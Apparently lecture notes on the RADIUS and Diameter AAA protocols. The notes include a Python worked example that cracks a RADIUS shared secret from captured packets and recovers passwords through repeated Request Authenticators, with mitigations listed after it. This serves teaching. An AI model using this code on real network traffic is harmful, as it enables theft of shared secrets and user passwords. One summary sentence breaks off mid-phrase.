RADIUS - Introduction:
RADIUS is an application-level protocol that carries authentication, authorization and configuration information between a Network Access Server (NAS) and a shared Authentication Server.
A standardized protocol is required between the access server and the user information repository in order to exchange authentication-, authorization- and accounting-related information. The RADIUS protocol was designed to provide a simple but efficient way to deliver such AAA capability.
Terminology:
Service - what the NAS provides to the dial-in user, for example a PPP link or a telnet login.
Session - each service provided by the NAS to a user constitutes a session; it starts when the service is first provided and ends when the service is ended.
Silently discard - the implementation discards the packet without further processing; it should log the event and may keep a counter of such packets.
Access-Request - the packet the NAS sends to the RADIUS server carrying the user's credentials and the details of the connection.
Access-Accept - the server's reply when every attribute value in the Access-Request is acceptable; it carries the configuration for the service to be delivered.
RADIUS Overview:
[Figure: RADIUS overview. The user connects to the RADIUS client (the NAS). The NAS sends an Authentication Request to the RADIUS server and receives an Authentication Acknowledgement in reply. Accounting records for the user's session are also sent from the RADIUS client to the RADIUS server.]
Built-in accounting schemes:
- Unix accounting: accounting data are stored in files and can be viewed with the radwho and radlast commands.
- Detailed accounting: the detailed accounting information is stored in plain-text format, so the resulting files can easily be parsed with standard text-processing tools.
- SQL accounting: accounting information is stored in an SQL database and processed with standard SQL queries.
RADIUS is extensible: every transaction is a list of type/length/value attributes, so new attributes can be added without disturbing existing implementations.
Packet Frame:
Code (1 octet) - identifies the packet type (Access-Request, Access-Accept, Access-Reject, Accounting-Request, ...)
Identifier (1 octet) - matches a reply to the request it answers
Length (2 octets) - length of the whole packet, header and attributes included
Authenticator (16 octets) - value used to authenticate the reply from the RADIUS server; in a request it is also the input to the password-hiding algorithm
Attributes - the data, as a sequence of type/length/value triples
Limitations
Response Authenticator based shared-secret attack: the attacker listens to requests and server responses. Everything that goes into the Response Authenticator except the secret is visible on the wire, so he pre-computes the MD5 state over the prefix Code + ID + Length + RequestAuth + Attributes once, then performs an exhaustive search on the shared secret, appending each candidate to that state and comparing the result with the observed authenticator.
User-Password attribute based shared-secret attack: the attacker attempts a connection to the NAS with a password he knows and intercepts the resulting Access-Request. For each candidate secret he computes MD5(secret + RequestAuth) and checks whether XORing it with the User-Password attribute yields his known password, again an exhaustive search on the shared secret.
User-Password based password attack: an exhaustive or dictionary attack on the user's password, XORing each guess with the MD5 value above and sending the result in the User-Password attribute of a replayed request. This is possible because the request packet itself carries no authentication.
Limitations (continued)
Shared-secret hygiene: many NASes are commonly configured with one and the same secret, so the server effectively sees them as a single client, and a short secret makes the exhaustive searches above easy.
Request Authenticator based attacks: if the NAS repeats a Request Authenticator, every request using it hides the first block of the User-Password with the same keystream MD5(secret + RequestAuth).
- Passive User-Password compromise through repeated Request Authenticators: from a request whose password he knows, the attacker recovers the keystream for that Request Authenticator and builds a dictionary from RequestAuth to keystream; any later request with the same value reveals its password.
- Active User-Password compromise through repeated Request Authenticators: the attacker builds a dictionary as before. When he predicts that he can cause the NAS to use a certain Request Authenticator, he attempts a connection and intercepts the resulting Access-Request.
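As an added worked example (not part of the original slides), the following Python builds packets in the frame described above, hides a User-Password with the RFC 2865 algorithm, computes and verifies the Response Authenticator, and then carries out two of the attacks just described: the Response Authenticator based dictionary search for the shared secret, and the passive User-Password compromise through a repeated Request Authenticator. The secret, user names, passwords, wordlist and the "captured" packets are all constructed inside the example; nothing is taken from a real NAS.

```python
# Added example: RFC 2865 packet handling and two of the attacks from the slides.
# Secret, passwords, wordlist and "captured" packets are constructed here.
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2   # Code values
USER_NAME, USER_PASSWORD = 1, 2        # attribute types

def build_packet(code, ident, authenticator, attrs):
    """Code(1) Identifier(1) Length(2) Authenticator(16) then Type/Length/Value attributes."""
    body = b"".join(struct.pack("BB", t, len(v) + 2) + v for t, v in attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + authenticator + body

def parse_packet(data):
    """Return (code, identifier, authenticator, [(type, value), ...]).
    A packet whose Length is out of range is silently discarded (here: raised)."""
    code, ident, length = struct.unpack("!BBH", data[:4])
    if not 20 <= length <= len(data):
        raise ValueError("silently discard: bad Length")
    attrs, pos = [], 20
    while pos < length:
        t, alen = data[pos], data[pos + 1]
        if alen < 2 or pos + alen > length:
            raise ValueError("silently discard: bad attribute length")
        attrs.append((t, data[pos + 2:pos + alen]))
        pos += alen
    return code, ident, data[4:20], attrs

def build_response(code, ident, req_auth, attrs, secret):
    """Response Authenticator = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    unsigned = build_packet(code, ident, req_auth, attrs)   # RequestAuth occupies the field
    return unsigned[:4] + hashlib.md5(unsigned + secret).digest() + unsigned[20:]

def verify_response(response, req_auth, secret):
    """What the NAS does with a reply: recompute the authenticator under the shared secret."""
    expected = hashlib.md5(response[:4] + req_auth + response[20:] + secret).digest()
    return hmac.compare_digest(expected, response[4:20])

def encode_user_password(password, secret, req_auth):
    """RFC 2865 sec. 5.2: pad with NULs to a multiple of 16 octets, then
    c1 = p1 XOR MD5(S + RA) and c_i = p_i XOR MD5(S + c_{i-1})."""
    padded = password.ljust(max(16, (len(password) + 15) // 16 * 16), b"\x00")
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        out += prev
    return out

def decode_user_password(enc, secret, req_auth):
    """Inverse of encode_user_password; trailing NUL padding is stripped."""
    out, prev = b"", req_auth
    for i in range(0, len(enc), 16):
        keystream = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(enc[i:i + 16], keystream))
        prev = enc[i:i + 16]
    return out.rstrip(b"\x00")

def crack_shared_secret(request, response, wordlist):
    """Response Authenticator based attack: everything except the secret is on the
    wire, so hash that prefix once and append each candidate secret to a copy."""
    _, _, req_auth, _ = parse_packet(request)
    prefix = hashlib.md5(response[:4] + req_auth + response[20:])
    for candidate in wordlist:
        h = prefix.copy()
        h.update(candidate)
        if h.digest() == response[4:20]:
            return candidate
    return None

def recover_via_repeated_authenticator(enc_known, known_password, enc_victim):
    """Passive compromise through a repeated Request Authenticator: both requests hide
    their first block with MD5(S + RA), so the attacker's own known password exposes
    that keystream and strips it off the victim's User-Password attribute."""
    keystream = bytes(c ^ p for c, p in zip(enc_known[:16], known_password.ljust(16, b"\x00")))
    return bytes(c ^ k for c, k in zip(enc_victim[:16], keystream)).rstrip(b"\x00")

def demo():
    secret = b"s3cret"                    # constructed, dictionary-sized shared secret
    req_auth = os.urandom(16)             # fresh and random, as a NAS should choose it
    req = build_packet(ACCESS_REQUEST, 7, req_auth, [
        (USER_NAME, b"alice"),
        (USER_PASSWORD, encode_user_password(b"hunter2", secret, req_auth))])
    resp = build_response(ACCESS_ACCEPT, 7, req_auth, [], secret)
    assert verify_response(resp, req_auth, secret)
    # attacker captured req and resp: offline dictionary search for the secret
    found = crack_shared_secret(req, resp, [b"password", b"radius", b"s3cret", b"admin"])
    _, _, ra, attrs = parse_packet(req)
    alice_pw = decode_user_password(dict(attrs)[USER_PASSWORD], found, ra)
    # a NAS that reuses req_auth: attacker logs in with a known password, victim follows
    mine = encode_user_password(b"attacker", secret, req_auth)
    victim = encode_user_password(b"letmein!", secret, req_auth)
    leaked = recover_via_repeated_authenticator(mine, b"attacker", victim)
    return found, alice_pw, leaked

if __name__ == "__main__":
    print(demo())   # (b's3cret', b'hunter2', b'letmein!')
```

With the MD5 state precomputed, each guess costs a single MD5 update over the candidate secret, which is why a short or dictionary-sized secret falls immediately; once the secret is known every User-Password ever captured under it can be decoded. Note that the repeated-authenticator recovery needs no knowledge of the secret at all. Within RADIUS itself the only mitigations are long random secrets, one secret per NAS, a NAS that never repeats a Request Authenticator, and protecting the UDP transport (for example with IPsec).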
Diameter - Introduction
The Diameter protocol was derived from the RADIUS protocol with improvements in many aspects, and is generally regarded as the next-generation Authentication, Authorization and Accounting (AAA) protocol. Diameter is widely used in the IMS architecture by IMS entities to exchange AAA-related information.
Diameter is peer-to-peer rather than strictly client/server: every host that implements the Diameter protocol can act as either a client or a server, depending on the network deployment.
Diameter agents:
- Relay Agent: forwards a message to the appropriate destination, depending on the information contained in the message.
- Proxy Agent: can also be used to forward messages, but unlike a Relay Agent a Proxy Agent can modify the message content and therefore provide value-added services, enforce rules on different messages, or perform administrative tasks for a specific realm.
- Redirect Agent: acts as a centralized configuration repository for other Diameter nodes. When it receives a message, it checks its routing table and returns a response message carrying the redirection information to the original sender.
- Translation Agent (a special agent): converts a message from one AAA protocol to another, for example between RADIUS and Diameter.
Comparison of RADIUS and Diameter:

Feature                      RADIUS                                             Diameter
Agent support                implicit: agent behaviour may be implemented       Relay, Proxy, Redirect and Translation
                             inside a RADIUS server                             agents defined by the protocol
Capability negotiation       not supported                                      negotiates supported applications and security level
Peer discovery               static configuration                               static configuration and dynamic lookup
Server-initiated messages    not in the base protocol                           supported, for example re-authentication and session termination
Maximum attribute data       253 octets                                         16,777,215 octets
Vendor-specific extensions   vendor-specific attributes                         both vendor-specific messages and attributes
Summary
RADIUS is a remote authentication protocol and the de facto standard for remote authentication. RADIUS is an extensible protocol, and can support many authentication
In addition to SIP, Diameter is the other core protocol used in the IP Multimedia Subsystem (IMS) architecture, in both the service plane and the control plane. IMS defines a set of reference points between different IMS entities, and some of them use Diameter as the underlying protocol to exchange subscription-, presence- and billing-related messages. For example, the Sh reference point in IMS defines a set of Diameter messages for subscription and notification purposes.